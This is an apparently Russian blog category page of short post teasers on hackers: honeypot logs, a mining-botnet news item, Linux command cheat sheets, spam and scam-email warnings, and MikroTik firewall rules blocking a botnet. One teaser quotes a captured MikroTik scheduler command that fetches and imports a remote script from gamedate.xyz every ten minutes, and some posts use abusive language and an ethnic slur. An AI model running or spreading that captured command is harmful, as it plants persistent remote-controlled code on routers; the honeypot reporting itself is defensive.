Рейтинг
0.00
avatar

ХАЦКЕРЫ

Подробнее ↓

Наивные ХАКЕРЫ или Тролим БОТНЕТ WANNAMINE

ХАЦКЕРЫ
haker pidor
На накенец-то дошли руки до того чтобы посмотреть зачем хакерам доступ к терминалу SSH и Telnet.
Запускаем на серваке ФЭЙКОВЫЙ терминал cowrie, даём кулхакеру подобрать пароль напимер admin и пароль Qwerty!
Ржом!
Большинство уродБотНетов делают одно и тоже.
Входят,
62.93.166.91] login attempt [b'nproc'/b'nproc'] succeeded

Узнают тип процессора
62.93.166.91] executing command «b'cat /proc/cpuinfo | grep name | wc -l'»
62.93.166.91] Command found: cat /proc/cpuinfo

ну и уходят.

Но попался наконец-то кулхацкер… айпишник этого говноря 58.240.92.50! Ещё и китайский конечно же.

Читать дальше

Ботнет-майнинг Monero,

ХАЦКЕРЫ
Ботнет-майнинг Monero,
предназначенный для серверов Redis и OrientDB, заразил почти 4400 серверов и с марта 2017 года добыл Monero на сумму более 925 000 долларов.

Ботнет, названный DDG на основе одного из своих модулей, нацелен на серверы Redis с помощью атаки методом перебора словаря учетных данных; и базы данных OrientDB, используя уязвимость CVE-2017-11467 для удаленного выполнения кода.
ищетуе ьштштп ввп
«[DDG] стремится к серверам баз данных, поскольку серверы баз данных, как правило, оборудованы с большим количеством ЦП и памяти, а это значит, [они] более мощных горных машин,» сказал Ли Fengpei, исследователь безопасности с командой Qihoo 360. NetLab Bleeping Компьютер вчера.

Читать дальше

Linux Нужные команды чтоб не забыть часть 2

ХАЦКЕРЫ
Выставление/изменение полномочий на файлы

ls -lh — просмотр полномочий на файлы и директории в текущей директории
ls /tmp | pr -T5 -W$COLUMNS — вывести содержимое директории /tmp и разделить вывод на пять колонок
chmod ugo+rwx directory1 — добавить полномочия на директорию directory1 ugo(User Group Other)+rwx(Read Write eXecute) — всем полные права. Аналогичное можно сделать таким образом chmod 777 directory1
chmod go-rwx directory1 — отобрать у группы и всех остальных все полномочия на директорию directory1.
chown user1 file1 — назначить владельцем файла file1 пользователя user1
chown -R user1 directory1 — назначить рекурсивно владельцем директории directory1 пользователя user1
chgrp group1 file1 — сменить группу-владельца файла file1 на group1
chown user1:group1 file1 — сменить владельца и группу владельца файла file1
find / -perm -u+s — найти, начиная от корня, все файлы с выставленным SUID
chmod u+s /bin/binary_file — назначить SUID-бит файлу /bin/binary_file. Это даёт возможность любому пользователю запускать на выполнение файл с полномочиями владельца файла.
chmod u-s /bin/binary_file — снять SUID-бит с файла /bin/binary_file.
chmod g+s /home/public — назначить SGID-бит директории /home/public.
chmod g-s /home/public — снять SGID-бит с директории /home/public.
chmod o+t /home/public — назначить STIKY-бит директории /home/public. Позволяет удалять файлы только владельцам
chmod o-t /home/public — снять STIKY-бит с директории /home/public

Читать дальше

Linux Нужные команды чтоб не забыть часть 1

ХАЦКЕРЫ
Системная информация

arch
uname -m — отобразить архитектуру компьютера
uname -r — отобразить используемую версию ядра
dmidecode -q — показать аппаратные системные компоненты — (SMBIOS / DMI)
hdparm -i /dev/hda — вывести характеристики жесткого диска
hdparm -tT /dev/sda — протестировать производительность чтения данных с жесткого диска
cat /proc/cpuinfo — отобразить информацию о процессоре
cat /proc/interrupts — показать прерывания
cat /proc/meminfo — проверить использование памяти
cat /proc/swaps — показать файл(ы) подкачки
cat /proc/version — вывести версию ядра
cat /proc/net/dev — показать сетевые интерфейсы и статистику по ним
cat /proc/mounts — отобразить смонтированные файловые системы
lspci -tv — показать в виде дерева PCI устройства
lsusb -tv — показать в виде дерева USB устройства
date — вывести системную дату
cal 2007 — вывести таблицу-календарь 2007-го года
date 041217002007.00* — установить системные дату и время ММДДЧЧммГГГГ.СС (МесяцДеньЧасМинутыГод.Секунды)
clock -w — сохранить системное время в BIOS


Читать дальше

Linux Нужные команды Vbox и другие

ХАЦКЕРЫ
Перенос файлов по SSH
откуда куда
scp -rCvp -P 22 [email protected]:/mnt/backup/Test.vdi /mnt/backup/

rsync -avz -e "ssh -p 22" --progress --exclude='Deb.vdi' --exclude='zabbix.sql'  --exclude='mysql.tar.gz' [email protected]:/mnta/* /mnt4tb/


Простой перенос файлов из папки в папку
-----только для дебиана пример
sudo rsync -avh /mnr/boot/ /mnt/sdb1
sudo rsync -avh /mnr/ /mnt/sdb2

Читать дальше

Блокируем спамера Aleksandr mayboroda_aleks хохол

ХАЦКЕРЫ

Задалбал этот спамер mayboroda_aleks

.
Шлёт постоянно эту бредятину про якобы продвижение сайтов.
Этот хохлабред уже задалбал. 5 лет подряд спамит одну и туже хрень. Тупой мальчик, ничего умней не придумал как меняеть домен и продолжать спамить.
На него жалуются даже китайцы. Но они нашли простой способ борьбы — добавили домен .RU в фильтр и больше нет писем от спамера!

Пользователей нормальных почтовиков типа Яндекса с автоматическим фильтром спама этот дебилоид не достаёт, но есть почтовики без автоматического фильтра, где фильтры надо настраивать вручную.

Читать дальше

Письма мошенников ЛОШАРИКОВ! У вас серьёзная проблема?

ХАЦКЕРЫ
Если Вам пришло подобное письмо, сообщение в соц сеть или мессенджер! Не ведитесь это мошенники !
100% Разводилово.
В противном случае должно быть какое-либо доказательство сказанного, а это обычный шаблон рассылка рассчитаное на лох0FF.

Пример письма
Здравствуйте!

Думаю Вас не очень обрадует то, что вы увидите дальше.
Дело вот в чём: через ваш роутер я подключился к вашей сети. Далее Я нашёл брешь в операционной системе вашего компьютера и залил свой код. Во всём виновата ваша любовь к жёсткой порнушке.

Читать дальше

Перехваченные комманды хацкеров в FAKE SSH Honeypot cowrie

ХАЦКЕРЫ

Это перехваченные команды хацкеров через HONEYPOT COWRIE

ВВДИТЬ И ИСПОЛНЯТЬ ИХ НЕЛЬЗЯ! Ну если только очень хочется.)
перехват хакерских комманд через эмулятор терминала SSH
Перехват хакерских команд через эмулятор терминала SSH cowrie honeypot.

Микротиковский замес
/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://gamedate.xyz/poll/b94cc680-52b5-4c5a-92f0-37f0a1307729 mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write,1


и далее
Читать дальше

Новые атаки GRE на VPN Микротик (pptp l2tp)

ХАЦКЕРЫ
Ботнет 92.63.194.0/24 GRE
Имея внешние ip адреса логах микротика периодически кто-то ломится. То в winbox, но он закрыт из вне, то в VPN. Сейчас капитально присосался какой-то ботнет с подсети 92.63.194.0/24
Что он делает?
Ломится подбирая нелепые логины, ну и ладно бы, но залипли установленные соединения и удалить их нельзя -они восстанавливаются.
впн микротик атаки GRE
Вот зараза !
92.63.194.155
92.63.194.158
92.63.194.156
92.63.194.40
92.63.194.91
92.63.194.35
92.63.194.69
92.63.194.41
92.63.194.155
92.63.194.93
92.63.194.92
92.63.194.159
92.63.194.157
Что делать?
Сперва добавлять нижеприведённые правила и шиться последней прошивкой.
/ip firewall raw
add action=drop chain=prerouting src-address-list=Botlist
/ip firewall address-list
add address=92.63.194.0/24 list=Botlist

Теперь осталось только ждать новых и добавлять их в Botlist

МУДАКофский die(pi()*42);

ХАЦКЕРЫ
А вот список файлов в которые пытаюся впихнуть гадкий код с помощью POST запросов

417.509.php
accept.client.php
accept.json.php
accepted.sess.php
accepted.tools.php
assets
bad.except.php
body.work.php
code.sessions.php
conflicts.link.php
content.img.php
cookie.media.php
data.using.php
database.class.php
database.http.php
exception.config.php
exceptions.throw.php
exceptions.work.php
fail.lib.php
Читать дальше